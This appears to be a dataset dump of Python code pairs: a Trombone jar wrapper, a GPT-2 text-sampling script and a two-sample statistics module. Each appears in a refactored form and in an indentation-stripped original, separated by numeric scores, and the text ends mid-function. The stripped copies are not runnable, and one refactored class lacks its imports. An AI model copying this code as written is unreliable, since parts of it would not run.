from typing import Dict, List, Optional, Tuple
from .util import download_file
class Trombone:
    """Thin wrapper around the Trombone text-analysis jar.

    The jar is downloaded to *jar_path* on first use; helpers run it as a
    subprocess and parse the JSON object it prints to stdout.
    """

    def __init__(self, jar_path: Optional[str] = None):
        """Locate the Trombone jar, downloading it if it is missing."""
        target = '/tmp/trombone.jar' if jar_path is None else jar_path
        if not os.path.exists(target):
            print(f'Downloading Trombone ({target}). This may take some minutes ...')
            download_file(
                url='https://github.com/ulaval-rs/pytrombone/releases/download/v0.1.3/trombone-5.2.1-with-dependencies.jar',
                new_file_name=target
            )
            print(f'Trombone ({target}) downloaded.')
        if not os.path.exists(target):
            raise FileNotFoundError(f'pytrombone.jar not found at {target}')
        self.jar_path = target

    def get_version(self):
        """Run Trombone with no arguments and return its parsed JSON output."""
        raw_output, _ = self.run()
        return self.serialize_output(raw_output)

    def run(self, key_values: Optional[List[Tuple[str, str]]] = None) -> Tuple[str, str]:
        """Run Trombone with given arguments.

        Args:
            key_values: List of tuples of (key, value) of arguments to give
                to the Trombone executable.
                Example: [('tool', 'corpus.DocumentSMOGIndex'), ('storage', 'file')]

        Returns:
            Tuple of (output, error), both in str.
        """
        cli_args = [f'{key}={value}' for key, value in (key_values or [])]
        process = subprocess.Popen(
            ['java', '-jar', self.jar_path, *cli_args],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE
        )
        out, err = process.communicate()
        return out.decode(), err.decode()

    def serialize_output(self, output: str) -> Dict:
        """Parse the JSON object embedded in Trombone's stdout.

        Trombone may print log noise before the JSON payload, so parsing
        starts at the first '{' (falling back to index 0 when none is
        found, matching the original behaviour).
        """
        start = max(output.find('{'), 0)
        return json.loads(output[start:])
import os
import subprocess
from typing import Dict, List, Optional, Tuple
from .util import download_file
class Trombone:
def __init__(self, jar_path: Optional[str] = None):
if jar_path is None:
jar_path = '/tmp/trombone.jar'
if not os.path.exists(jar_path):
print(f'Downloading Trombone ({jar_path}). This may take some minutes ...')
download_file(
url='https://github.com/ulaval-rs/pytrombone/releases/download/v0.1.3/trombone-5.2.1-with-dependencies.jar',
new_file_name=jar_path
)
print(f'Trombone ({jar_path}) downloaded.')
if not os.path.exists(jar_path):
raise FileNotFoundError(f'pytrombone.jar not found at {jar_path}')
self.jar_path = jar_path
def get_version(self):
output, _ = self.run()
serialized_output = self.serialize_output(output)
return serialized_output
def run(self, key_values: Optional[List[Tuple[str, str]]] = None) -> Tuple[str, str]:
"""Run Trombone with given arguments.
Args:
key_values: List of tuples of (key, value) of arguments to give to the Trombone executable.
Example: [('tool', 'corpus.DocumentSMOGIndex'), ('storage', 'file')]
Returns:
Tuple of (output, error), both in str.
"""
formatted_args = []
if key_values:
formatted_args = [f'{key}={value}' for key, value in key_values]
process = subprocess.Popen(
['java', '-jar', self.jar_path] + formatted_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
stdout, stderr = process.communicate()
return stdout.decode(), stderr.decode()
def serialize_output(self, output: str) -> Dict:
index_where_json_start = 0
for i, c in enumerate(output):
if c == '{':
index_where_json_start = i
break
return json.loads(output[index_where_json_start:]) | 0.68458 | 0.180576 |
from transformers import GPT2Tokenizer, GPT2LMHeadModel
import random
import os
import argparse
def parse_arguments():
    """Parse known command-line arguments; unrecognised ones are ignored."""
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--model_path",
        type=str,
        default="belgpt2",
        help="Path of the model directory.",
    )
    known_args, _ = parser.parse_known_args()
    return known_args
def load_model(model_dir=None):
    """Load a GPT-2 tokenizer and LM-head model via ``from_pretrained``.

    *model_dir* may be a local directory of saved weights or a Hugging
    Face hub identifier; in the latter case the files are downloaded and
    cached by the transformers library.

    Returns a tuple consisting of ``(model, tokenizer)``.
    """
    tokenizer = GPT2Tokenizer.from_pretrained(model_dir)
    model = GPT2LMHeadModel.from_pretrained(model_dir)
    return model, tokenizer
def generate(model, tokenizer, input_text=None, num_samples=1, max_length=100, top_k=50, top_p=0.95):
    """Sample text from *model* with top-k / nucleus sampling.

    Args:
        model: a GPT2LMHeadModel (or compatible); switched to eval mode here.
        tokenizer: tokenizer used to encode the prompt and decode samples.
        input_text: optional prompt; when falsy, generation starts from a
            random BOS token id.
        num_samples: number of independent samples to return.
        max_length: maximum generated sequence length in tokens.
        top_k: top-k sampling cutoff.
        top_p: nucleus (top-p) sampling cutoff.

    Returns:
        List of decoded strings, one per sample.
    """
    model.eval()
    if input_text:
        input_ids = tokenizer.encode(input_text, return_tensors='pt')
        output = model.generate(
            input_ids=input_ids,
            do_sample=True,
            top_k=top_k,
            max_length=max_length,
            top_p=top_p,
            num_return_sequences=num_samples
        )
    else:
        # BUG FIX: this branch previously hard-coded top_k=50 and
        # top_p=0.95, silently ignoring the caller's arguments. The
        # defaults are unchanged, so existing callers behave identically.
        output = model.generate(
            bos_token_id=random.randint(1, 50000),
            do_sample=True,
            top_k=top_k,
            max_length=max_length,
            top_p=top_p,
            num_return_sequences=num_samples
        )
    return [tokenizer.decode(sample, skip_special_tokens=True) for sample in output]
def main(args):
    """Prompt the user for text, then generate and print a continuation."""
    # Ask user to input text.
    input_text = input("Enter text: ")
    # Load model and tokenizer.
    model, tokenizer = load_model(args.model_path)
    # Generate text.
    decoded_output = generate(model, tokenizer, input_text=input_text)
    print(decoded_output)
    return
if __name__=="__main__":
args = parse_arguments()
main(args) | scripts/tools/generate_text.py | from transformers import GPT2Tokenizer, GPT2LMHeadModel
import random
import os
import argparse
def parse_arguments():
"""
Parser.
"""
parser = argparse.ArgumentParser()
parser.add_argument("--model_path",
type=str,
default="belgpt2",
help="Path of the model directory."
)
arguments, _ = parser.parse_known_args()
return arguments
def load_model(model_dir=None):
"""
Loads the saved model from disk if the directory exists.
Otherwise it will download the model and tokenizer from hugging face.
Returns a tuple consisting of `(model,tokenizer)`.
"""
tokenizer = GPT2Tokenizer.from_pretrained(model_dir)
model = GPT2LMHeadModel.from_pretrained(model_dir)
return model, tokenizer
def generate(model, tokenizer, input_text=None, num_samples=1, max_length=100, top_k=50, top_p=0.95):
"""
"""
model.eval()
if input_text:
input_ids = tokenizer.encode(input_text, return_tensors='pt')
output = model.generate(
input_ids = input_ids,
do_sample = True,
top_k = top_k,
max_length = max_length,
top_p = top_p,
num_return_sequences = num_samples
)
else:
output = model.generate(
bos_token_id = random.randint(1,50000),
do_sample = True,
top_k = 50,
max_length = max_length,
top_p = 0.95,
num_return_sequences = num_samples
)
decoded_output = []
for sample in output:
decoded_output.append(tokenizer.decode(sample, skip_special_tokens=True))
return decoded_output
def main(args):
"""
"""
# Ask user to input text.
input_text = input("Enter text: ")
# Load model and tokenizer.
model, tokenizer = load_model(args.model_path)
# Generate text.
decoded_output = generate(model, tokenizer, input_text=input_text)
print(decoded_output)
return
if __name__=="__main__":
args = parse_arguments()
main(args) | 0.703142 | 0.252303 |
import pandas as pd
import numpy as np
import math
import scipy.stats as stats
import statsmodels.stats.api as sms
def inter_p_value(p_value):
    """Map a p-value to a qualitative strength-of-evidence label.

    Parameters
    ----------
    p_value : float
        The p-value to interpret; must be a non-negative number.

    Returns
    -------
    str
        'Overwhelming Evidence' (< 0.01), 'Strong Evidence' ([0.01, 0.05)),
        'Weak Evidence' ([0.05, 0.1)) or 'No Evidence' (>= 0.1).

    Raises
    ------
    ValueError
        If p_value is negative or NaN. (The original fell through all
        branches and raised UnboundLocalError in these cases.)
    """
    if p_value < 0 or math.isnan(p_value):
        raise ValueError(f'p_value must be a non-negative number, got {p_value}')
    # Each elif already implies the lower bound checked by the branch above.
    if p_value < 0.01:
        return 'Overwhelming Evidence'
    elif p_value < 0.05:
        return 'Strong Evidence'
    elif p_value < 0.1:
        return 'Weak Evidence'
    return 'No Evidence'
def two_population(a, b, alpha=.05, consistency='equal', option='right', show_table=False, stages=(1, 2, 3), show=True, precision=4, matched_pairs=False):
    """Two-population inference on samples ``a`` and ``b``.

    + [First stage]: F Statistics - consistency: equal, left (1 is more consistent than 2), right (2 is more consistent than 1)
    + [Second stage]: t Test
    + [Third stage]: Confidence Interval
    Will return a result_dict regardless of stages.

    Args:
        a, b: Array-like numeric samples (numpy arrays / pandas Series).
        alpha (float): Significance level.
        consistency (str): Alternative for the F test: 'equal', 'left', 'right'.
        option (str): Alternative for the t test: 'right', 'left', 'two-tail'.
        show_table (bool): Append the statsmodels CI summary table to the report.
        stages (sequence): Which of stages 1-3 to run (default was a mutable
            list; an equivalent tuple is used to avoid the shared-default trap).
        show (bool): Print the text report.
        precision (int): Decimal places in the report.
        matched_pairs (bool): Treat ``a - b`` as paired differences.

    Returns:
        dict: Statistics, p-values, critical values and confidence intervals,
        keyed per stage.
    """
    opt = option.lower()[0]
    results = ""
    const = consistency.lower()[0]
    result_dict = dict()
    df_1 = len(a) - 1
    df_2 = len(b) - 1
    # Default to the pooled (equal-variance) t test when stage 1 is skipped.
    # Previously `flag` was unbound in that case and stage 2 crashed with
    # UnboundLocalError for non-matched-pairs input.
    flag = False
    if 1 in stages:
        varall = [stats.describe(a).variance,
                  stats.describe(b).variance]
        f_value = varall[0] / varall[1]
        result_dict['varall'] = varall
        result_dict['f_value'] = f_value
        ptmp = stats.f.cdf(f_value, df_1, df_2)
        if const == 'e':
            # Two-sided F test for equality of variances.
            if ptmp > 0.5:
                ptmp = 1 - ptmp
            p_value = ptmp * 2
            rej_upper = stats.f.ppf(1 - alpha/2, df_1, df_2)
            rej_lower = stats.f.ppf(alpha/2, df_1, df_2)
            result_dict['f_rej_upper'] = rej_upper
            result_dict['f_rej_lower'] = rej_lower
            flag = f_value < rej_lower or f_value > rej_upper
            text = 'unequal variances'
        else:
            rej_upper = stats.f.ppf(1 - alpha, df_1, df_2)
            rej_lower = stats.f.ppf(alpha, df_1, df_2)
            if const == 'r':
                # Right-tail alternative: population 2 more consistent.
                result_dict['f_rej_upper'] = rej_upper
                p_value = 1 - ptmp
                flag = f_value > rej_upper
                text = 'σ_1/σ_2 > 1'
            else:
                # Left-tail alternative: population 1 more consistent.
                result_dict['f_rej_lower'] = rej_lower
                p_value = ptmp
                flag = f_value < rej_lower
                text = 'σ_1/σ_2 < 1'
        result_dict['p_value'] = p_value
        results = f""" F Statistics
===================================
F statistic = {f_value:.{precision}f}
p-value = {p_value:.{precision}f} ({inter_p_value(p_value)})
Reject H_0 ({text}) → {flag}
"""
    if 2 in stages:
        if matched_pairs:
            # Paired-sample t test on the differences a - b.
            samp_diff = a - b
            nobs = samp_diff.shape[0]
            df = nobs - 1
            tmpdesc = stats.describe(samp_diff)
            t_value = tmpdesc.mean / (tmpdesc.variance ** 0.5) * (nobs ** 0.5)
            # p-values
            ptmp = stats.t.cdf(t_value, df)
            if opt == 'r':
                text = 'one-tail'
                tcv = stats.t.ppf(1 - alpha, df=df)
                p_value = 1 - ptmp
            elif opt == 'l':
                text = 'one-tail'
                p_value = ptmp
                tcv = stats.t.ppf(alpha, df=df)
            else:
                text = 'two-tail'
                tcv = stats.t.ppf(1 - alpha/2, df=df)
                if ptmp > 0.5:
                    ptmp = 1 - ptmp
                p_value = ptmp * 2
            flag = p_value < alpha
            results += f"""
t Test
===================================
t (Observed value) = {t_value:.{precision}f}
p-value ({text}) = {p_value:.{precision}f} ({inter_p_value(p_value)})
t (Critical, ({text})) = {tcv:.{precision}f}
DF = {(df):.{precision}f}
Reject H_0 → {flag}
"""
            result_dict['t_p_value'] = p_value
            result_dict['t_critical_value'] = tcv
            result_dict['t_observed_value'] = t_value
            # Always a two-sided CI on the mean difference.
            t_alpha = stats.t.ppf(1 - alpha / 2, df)
            std_xbar = (tmpdesc.variance / nobs) ** 0.5
            LCL = tmpdesc.mean - t_alpha * std_xbar
            UCL = tmpdesc.mean + t_alpha * std_xbar
            con_coef = 1 - alpha
            conf_interval = [LCL, UCL]
            result_dict['conf_interval'] = conf_interval
            results += f"""
Confidence Interval
===================================
{con_coef * 100:.1f}% Confidence Interval: [{LCL:.{precision}f}, {UCL:.{precision}f}]
"""
        else:
            if flag:  # True == unequal variance
                ttest_result = stats.ttest_ind(a, b, equal_var=False)
                t_summary = list(ttest_result)
                # NOTE(review): df_1 + df_2 is the pooled df; Welch's test
                # would use the Welch–Satterthwaite df.  Kept as-is to
                # preserve the reported values.
                t_critical_two = stats.t.ppf(1 - alpha/2, df=(df_1 + df_2))
                if opt == 'r':
                    t_critical_one = stats.t.ppf(1 - alpha, df=(df_1 + df_2))
                    result_dict['t_critical_one'] = t_critical_one
                elif opt == 'l':
                    t_critical_one = stats.t.ppf(alpha, df=(df_1 + df_2))
                    result_dict['t_critical_one'] = t_critical_one
                if opt == 't':
                    flag = t_summary[1] < alpha
                    result_dict['t_critical_two'] = t_critical_two
                    result_dict['t_observed_value'] = t_summary[0]
                    result_dict['t_p_value'] = t_summary[1]
                    result_dict['df'] = df_1 + df_2
                    results += f"""
t Test
===================================
t (Observed value) = {t_summary[0]:.{precision}f}
p-value (two-tail) = {t_summary[1]:.{precision}f} ({inter_p_value(t_summary[1])})
t (Critical, two-tail) = {t_critical_two:.{precision}f}
DF = {(df_1 + df_2):.{precision}f}
Reject H_0 → {flag}
"""
                else:
                    flag = t_summary[1] / 2 < alpha
                    result_dict['t_observed_value'] = t_summary[0]
                    result_dict['t_p_value'] = t_summary[1] / 2
                    result_dict['df'] = df_1 + df_2
                    results += f"""
t Test
===================================
t (Observed value) = {t_summary[0]:.{precision}f}
p-value (one-tail) = {(t_summary[1] / 2):.{precision}f} ({inter_p_value(t_summary[1] / 2)})
t (Critical, one-tail) = {t_critical_one:.{precision}f}
DF = {(df_1 + df_2):.{precision}f}
Reject H_0 → {flag}
"""
                if 3 in stages:
                    cm_result = sms.CompareMeans(
                        sms.DescrStatsW(a), sms.DescrStatsW(b))
                    conf_table = cm_result.summary(
                        usevar='unequal', alpha=alpha)
                    # Scrape the CI bounds out of the rendered summary table.
                    conf_interval = list(
                        map(float, conf_table.as_text().split('\n')[4].split()[6:]))
                    con_coef = 1 - alpha
                    # record result
                    result_dict['conf_interval'] = conf_interval
                    results += f"""
Confidence Interval
===================================
{con_coef * 100:.1f}% Confidence Interval: [{conf_interval[0]:.{precision}f}, {conf_interval[1]:.{precision}f}]
"""
            else:
                ttest_result = stats.ttest_ind(a, b, equal_var=True)
                t_summary = list(ttest_result)
                t_critical_two = stats.t.ppf(1 - alpha/2, df=(df_1 + df_2))
                if opt == 'r':
                    t_critical_one = stats.t.ppf(1 - alpha, df=(df_1 + df_2))
                    result_dict['t_critical_one'] = t_critical_one
                elif opt == 'l':
                    t_critical_one = stats.t.ppf(alpha, df=(df_1 + df_2))
                    result_dict['t_critical_one'] = t_critical_one
                if opt == 't':
                    flag = t_summary[1] < alpha
                    result_dict['t_critical_two'] = t_critical_two
                    result_dict['t_observed_value'] = t_summary[0]
                    result_dict['t_p_value'] = t_summary[1]
                    result_dict['df'] = df_1 + df_2
                    results += f"""
t Test
===================================
t (Observed value) = {t_summary[0]:.{precision}f}
p-value (two-tail) = {t_summary[1]:.{precision}f} ({inter_p_value(t_summary[1])})
t (Critical, two-tail) = {t_critical_two:.{precision}f}
DF = {(df_1 + df_2):.{precision}f}
Reject H_0 → {flag}
"""
                else:
                    flag = t_summary[1] / 2 < alpha
                    result_dict['t_observed_value'] = t_summary[0]
                    # Fix: store the one-tail p-value, consistent with the
                    # printed report and with the unequal-variance branch
                    # (previously the two-tail value was stored here).
                    result_dict['t_p_value'] = t_summary[1] / 2
                    result_dict['df'] = df_1 + df_2
                    results += f"""
t Test
===================================
t (Observed value) = {t_summary[0]:.{precision}f}
p-value (one-tail) = {(t_summary[1] / 2):.{precision}f} ({inter_p_value(t_summary[1] / 2)})
t (Critical, one-tail) = {t_critical_one:.{precision}f}
DF = {(df_1 + df_2):.{precision}f}
Reject H_0 → {flag}
"""
                if 3 in stages:
                    cm_result = sms.CompareMeans(
                        sms.DescrStatsW(a), sms.DescrStatsW(b))
                    conf_table = cm_result.summary(
                        usevar='pooled', alpha=alpha)
                    # Scrape the CI bounds out of the rendered summary table.
                    conf_interval = list(
                        map(float, conf_table.as_text().split('\n')[4].split()[6:]))
                    # record result
                    result_dict['conf_interval'] = conf_interval
                    con_coef = 1 - alpha
                    results += f"""
Confidence Interval
===================================
{con_coef * 100:.1f}% Confidence Interval: [{conf_interval[0]:.{precision}f}, {conf_interval[1]:.{precision}f}]
"""
    # Note: stage 3 runs nested inside stage 2, so conf_table only exists
    # when both stages ran (and not for matched pairs) — guarded below.
    if show_table == True and 3 in stages and not matched_pairs and 2 in stages:
        results += f"""{conf_table.as_text()}"""
    if show == True:
        print(results)
    return result_dict
def _check_normality(n1, n2, p1, p2):
if n1 * p1 >= 5 and n2 * p2 >= 5 and n1 * (1-p1) >= 5 and n2 * (1-p2) >= 5:
return True
else:
return False
def two_population_proportion(a, b, D, option='right', alpha=0.05, precision=4, show=True):
    """z test and confidence interval for the difference of two proportions.

    Args:
        a, b: Array-like 0/1 samples; their means are the sample proportions.
        D (float): Hypothesized difference p1 - p2 under H_0.
        option (str): 'right', 'left' or 'two-tail' alternative.
        alpha (float): Significance level.
        precision (int): Decimal places in the report.
        show (bool): Print the text report.

    Returns:
        dict: z statistic, p-value, critical value, normality check and
        the (always two-sided, unpooled) confidence interval.
    """
    opt = option.lower()[0]
    p1 = a.mean()
    p2 = b.mean()
    n1, n2 = len(a), len(b)
    result_dict = dict()
    result_dict['D'] = D
    result_dict['p1'] = p1
    result_dict['p2'] = p2
    result_dict['n1'] = n1
    result_dict['n2'] = n2
    result_dict['Normal'] = _check_normality(n1, n2, p1, p2)
    if D == 0:
        # H_0: p1 = p2 — use the pooled proportion for the standard error.
        ab_concat = np.concatenate([a, b])
        p_pool = ab_concat.mean()
        sd_p = (p_pool * (1 - p_pool) *
                (1 / n1 + 1 / n2)) ** 0.5
    else:
        # Non-zero hypothesized difference — unpooled standard error.
        sd_p = (p1 * (1-p1) / n1 + p2 * (1 - p2) / n2) ** 0.5
    result_dict['sd_p'] = sd_p
    z_value = ((p1 - p2) - D) / sd_p
    result_dict['z_value'] = z_value
    p_value = 1 - stats.norm.cdf(z_value)  # right
    if opt == 't':
        # two-tail test
        text = 'Two-Tail Test'
        if p_value > 0.5:
            p_value = 1 - p_value
        p_value *= 2
        zcv = stats.norm.ppf(1 - alpha/2)
        flag = p_value < alpha
        sub_result = f'''Using {text}:
z (Observed value, {text}) = {z_value:.{precision}f}
z (Critical value, {text}) = {-zcv:.{precision}f}, {zcv:.{precision}f}
p-value = {p_value:.{precision}f} ({inter_p_value(p_value)})
Reject H_0 → {flag}'''
    else:
        if opt == 'l':
            text = 'One-Tail Test (left tail)'
            p_value = stats.norm.cdf(z_value)
            zcv = -stats.norm.ppf(1 - alpha)
        elif opt == 'r':
            text = 'One-Tail Test (right tail)'
            zcv = stats.norm.ppf(1 - alpha)
        flag = p_value < alpha
        sub_result = f'''Using {text}:
z (Observed value) = {z_value:.{precision}f}
z (Critical value) = {zcv:.{precision}f}
p-value = {p_value:.{precision}f} ({inter_p_value(p_value)})
Reject H_0 → {flag}'''
    result_dict['p_value'] = p_value
    result_dict['zcv'] = zcv
    # The CI is always two-sided and uses the unpooled standard error.
    zcv = stats.norm.ppf(1 - alpha/2)
    con_coef = 1 - alpha
    sd_p = (p1 * (1-p1) / n1 + p2 * (1 - p2) / n2) ** 0.5  # always
    LCL = p1-p2 - zcv*sd_p
    UCL = p1-p2 + zcv*sd_p
    conf_interval = [LCL, UCL]
    result_dict['conf_interval'] = conf_interval
    result = f"""======= Inf. Two Population Proportions =======
D = {D:.{precision}f}
p1 = {p1:.{precision}f}
p2 = {p2:.{precision}f}
""" + sub_result + f"""
{con_coef * 100:.1f}% Confidence Interval: [{LCL:.{precision}f}, {UCL:.{precision}f}]"""
    if show:
        print(result)
    # Fix: the original final line had dataset-extraction residue fused
    # after `return result_dict`, which broke the file.
    return result_dict
import numpy as np
import math
import scipy.stats as stats
import statsmodels.stats.api as sms
def inter_p_value(p_value):
    """Map a p-value to a qualitative strength-of-evidence label.

    Args:
        p_value (float): Significance probability, expected in [0, 1].

    Returns:
        str: 'Overwhelming Evidence' (< 0.01), 'Strong Evidence'
        ([0.01, 0.05)), 'Weak Evidence' ([0.05, 0.1)) or
        'No Evidence' (>= 0.1).

    Raises:
        ValueError: If ``p_value`` is negative or NaN.  (Previously such
            input fell through every branch and raised an opaque
            ``UnboundLocalError``.)
    """
    if not p_value >= 0:  # also catches NaN, which fails every comparison
        raise ValueError(f"p_value must be non-negative, got {p_value!r}")
    if p_value < 0.01:
        return 'Overwhelming Evidence'
    if p_value < 0.05:
        return 'Strong Evidence'
    if p_value < 0.1:
        return 'Weak Evidence'
    return 'No Evidence'
def two_population(a, b, alpha=.05, consistency='equal', option='right', show_table=False, stages=[1, 2, 3], show=True, precision=4, matched_pairs=False):
"""
+ [First stage]: F Statistics - consistency: equal, left (1 is more consistent than 2), right (2 is more consistent than 1)
+ [Second stage]: t Test
+ [Third stage]: Confidence Interval
Will return a result_dict regardless of stages.
"""
opt = option.lower()[0]
results = ""
const = consistency.lower()[0]
result_dict = dict()
df_1 = len(a) - 1
df_2 = len(b) - 1
if 1 in stages:
varall = [stats.describe(a).variance,
stats.describe(b).variance]
f_value = varall[0] / varall[1]
result_dict['varall'] = varall
result_dict['f_value'] = f_value
ptmp = stats.f.cdf(f_value, df_1, df_2)
if const == 'e':
if ptmp > 0.5:
ptmp = 1 - ptmp
p_value = ptmp * 2
rej_upper = stats.f.ppf(1 - alpha/2, df_1, df_2)
rej_lower = stats.f.ppf(alpha/2, df_1, df_2)
result_dict['f_rej_upper'] = rej_upper
result_dict['f_rej_lower'] = rej_lower
if f_value < rej_lower or f_value > rej_upper:
flag = True
else:
flag = False
text = 'unequal variances'
else:
rej_upper = stats.f.ppf(1 - alpha, df_1, df_2)
rej_lower = stats.f.ppf(alpha, df_1, df_2)
if const == 'r':
result_dict['f_rej_upper'] = rej_upper
p_value = 1 - ptmp
if f_value > rej_upper:
flag = True
else:
flag = False
text = 'σ_1/σ_2 > 1'
else:
result_dict['f_rej_lower'] = rej_lower
p_value = ptmp
if f_value < rej_lower:
flag = True
else:
flag = False
text = 'σ_1/σ_2 < 1'
result_dict['p_value'] = p_value
results = f""" F Statistics
===================================
F statistic = {f_value:.{precision}f}
p-value = {p_value:.{precision}f} ({inter_p_value(p_value)})
Reject H_0 ({text}) → {flag}
"""
if 2 in stages:
if matched_pairs:
samp_diff = a - b
nobs = samp_diff.shape[0]
df = nobs - 1
tmpdesc = stats.describe(samp_diff)
t_value = tmpdesc.mean / (tmpdesc.variance ** 0.5) * (nobs ** 0.5)
# p-values
ptmp = stats.t.cdf(t_value, df)
if opt == 'r':
text = 'one-tail'
tcv = stats.t.ppf(1 - alpha, df=df)
p_value = 1 - ptmp
elif opt == 'l':
text = 'one-tail'
p_value = ptmp
tcv = stats.t.ppf(alpha, df=df)
else:
text = 'two-tail'
tcv = stats.t.ppf(1 - alpha/2, df=df)
if ptmp > 0.5:
ptmp = 1 - ptmp
p_value = ptmp * 2
flag = p_value < alpha
results += f"""
t Test
===================================
t (Observed value) = {t_value:.{precision}f}
p-value ({text}) = {p_value:.{precision}f} ({inter_p_value(p_value)})
t (Critical, ({text})) = {tcv:.{precision}f}
DF = {(df):.{precision}f}
Reject H_0 → {flag}
"""
result_dict['t_p_value'] = p_value
result_dict['t_critical_value'] = tcv
result_dict['t_observed_value'] = t_value
t_alpha = stats.t.ppf(1 - alpha / 2, df)
std_xbar = (tmpdesc.variance / nobs) ** 0.5
LCL = tmpdesc.mean - t_alpha * std_xbar
UCL = tmpdesc.mean + t_alpha * std_xbar
con_coef = 1 - alpha
conf_interval = [LCL, UCL]
result_dict['conf_interval'] = conf_interval
results += f"""
Confidence Interval
===================================
{con_coef * 100:.1f}% Confidence Interval: [{LCL:.{precision}f}, {UCL:.{precision}f}]
"""
else:
if flag: # True == unequal variance
ttest_result = stats.ttest_ind(a, b, equal_var=False)
t_summary = list(ttest_result)
t_critical_two = stats.t.ppf(1 - alpha/2, df=(df_1 + df_2))
if opt == 'r':
t_critical_one = stats.t.ppf(1 - alpha, df=(df_1 + df_2))
result_dict['t_critical_one'] = t_critical_one
elif opt == 'l':
t_critical_one = stats.t.ppf(alpha, df=(df_1 + df_2))
result_dict['t_critical_one'] = t_critical_one
if opt == 't':
flag = t_summary[1] < alpha
result_dict['t_critical_two'] = t_critical_two
result_dict['t_observed_value'] = t_summary[0]
result_dict['t_p_value'] = t_summary[1]
result_dict['df'] = df_1 + df_2
results += f"""
t Test
===================================
t (Observed value) = {t_summary[0]:.{precision}f}
p-value (two-tail) = {t_summary[1]:.{precision}f} ({inter_p_value(t_summary[1])})
t (Critical, two-tail) = {t_critical_two:.{precision}f}
DF = {(df_1 + df_2):.{precision}f}
Reject H_0 → {flag}
"""
else:
flag = t_summary[1] / 2 < alpha
result_dict['t_observed_value'] = t_summary[0]
result_dict['t_p_value'] = t_summary[1] / 2
result_dict['df'] = df_1 + df_2
results += f"""
t Test
===================================
t (Observed value) = {t_summary[0]:.{precision}f}
p-value (one-tail) = {(t_summary[1] / 2):.{precision}f} ({inter_p_value(t_summary[1] / 2)})
t (Critical, one-tail) = {t_critical_one:.{precision}f}
DF = {(df_1 + df_2):.{precision}f}
Reject H_0 → {flag}
"""
if 3 in stages:
cm_result = sms.CompareMeans(
sms.DescrStatsW(a), sms.DescrStatsW(b))
conf_table = cm_result.summary(
usevar='unequal', alpha=alpha)
conf_interval = list(
map(float, conf_table.as_text().split('\n')[4].split()[6:]))
con_coef = 1 - alpha
# record result
result_dict['conf_interval'] = conf_interval
results += f"""
Confidence Interval
===================================
{con_coef * 100:.1f}% Confidence Interval: [{conf_interval[0]:.{precision}f}, {conf_interval[1]:.{precision}f}]
"""
else:
ttest_result = stats.ttest_ind(a, b, equal_var=True)
t_summary = list(ttest_result)
t_critical_two = stats.t.ppf(1 - alpha/2, df=(df_1 + df_2))
if opt == 'r':
t_critical_one = stats.t.ppf(1 - alpha, df=(df_1 + df_2))
result_dict['t_critical_one'] = t_critical_one
elif opt == 'l':
t_critical_one = stats.t.ppf(alpha, df=(df_1 + df_2))
result_dict['t_critical_one'] = t_critical_one
if opt == 't':
flag = t_summary[1] < alpha
result_dict['t_critical_two'] = t_critical_two
result_dict['t_observed_value'] = t_summary[0]
result_dict['t_p_value'] = t_summary[1]
result_dict['df'] = df_1 + df_2
results += f"""
t Test
===================================
t (Observed value) = {t_summary[0]:.{precision}f}
p-value (two-tail) = {t_summary[1]:.{precision}f} ({inter_p_value(t_summary[1])})
t (Critical, two-tail) = {t_critical_two:.{precision}f}
DF = {(df_1 + df_2):.{precision}f}
Reject H_0 → {flag}
"""
else:
flag = t_summary[1] / 2 < alpha
result_dict['t_observed_value'] = t_summary[0]
result_dict['t_p_value'] = t_summary[1]
result_dict['df'] = df_1 + df_2
results += f"""
t Test
===================================
t (Observed value) = {t_summary[0]:.{precision}f}
p-value (one-tail) = {(t_summary[1] / 2):.{precision}f} ({inter_p_value(t_summary[1] / 2)})
t (Critical, one-tail) = {t_critical_one:.{precision}f}
DF = {(df_1 + df_2):.{precision}f}
Reject H_0 → {flag}
"""
if 3 in stages:
cm_result = sms.CompareMeans(
sms.DescrStatsW(a), sms.DescrStatsW(b))
conf_table = cm_result.summary(
usevar='pooled', alpha=alpha)
conf_interval = list(
map(float, conf_table.as_text().split('\n')[4].split()[6:]))
# record result
result_dict['conf_interval'] = conf_interval
con_coef = 1 - alpha
results += f"""
Confidence Interval
===================================
{con_coef * 100:.1f}% Confidence Interval: [{conf_interval[0]:.{precision}f}, {conf_interval[1]:.{precision}f}]
"""
if show_table == True and 3 in stages:
results += f"""{conf_table.as_text()}"""
if show == True:
print(results)
return result_dict
def _check_normality(n1, n2, p1, p2):
if n1 * p1 >= 5 and n2 * p2 >= 5 and n1 * (1-p1) >= 5 and n2 * (1-p2) >= 5:
return True
else:
return False
def two_population_proportion(a, b, D, option='right', alpha=0.05, precision=4, show=True):
opt = option.lower()[0]
p1 = a.mean()
p2 = b.mean()
n1, n2 = len(a), len(b)
result_dict = dict()
result_dict['D'] = D
result_dict['p1'] = p1
result_dict['p2'] = p2
result_dict['n1'] = n1
result_dict['n2'] = n2
result_dict['Normal'] = _check_normality(n1, n2, p1, p2)
if D == 0:
ab_concat = np.concatenate([a, b])
p_pool = ab_concat.mean()
sd_p = (p_pool * (1 - p_pool) *
(1 / n1 + 1 / n2)) ** 0.5
else:
sd_p = (p1 * (1-p1) / n1 + p2 * (1 - p2) / n2) ** 0.5
result_dict['sd_p'] = sd_p
z_value = ((p1 - p2) - D) / sd_p
result_dict['z_value'] = z_value
p_value = 1 - stats.norm.cdf(z_value) # right
if opt == 't':
# two-tail test
text = 'Two-Tail Test'
if p_value > 0.5:
p_value = 1 - p_value
p_value *= 2
zcv = stats.norm.ppf(1 - alpha/2)
flag = p_value < alpha
sub_result = f'''Using {text}:
z (Observed value, {text}) = {z_value:.{precision}f}
z (Critical value, {text}) = {-zcv:.{precision}f}, {zcv:.{precision}f}
p-value = {p_value:.{precision}f} ({inter_p_value(p_value)})
Reject H_0 → {flag}'''
else:
if opt == 'l':
text = 'One-Tail Test (left tail)'
p_value = stats.norm.cdf(z_value)
zcv = -stats.norm.ppf(1 - alpha)
elif opt == 'r':
text = 'One-Tail Test (right tail)'
zcv = stats.norm.ppf(1 - alpha)
flag = p_value < alpha
sub_result = f'''Using {text}:
z (Observed value) = {z_value:.{precision}f}
z (Critical value) = {zcv:.{precision}f}
p-value = {p_value:.{precision}f} ({inter_p_value(p_value)})
Reject H_0 → {flag}'''
result_dict['p_value'] = p_value
result_dict['zcv'] = zcv
zcv = stats.norm.ppf(1 - alpha/2)
con_coef = 1 - alpha
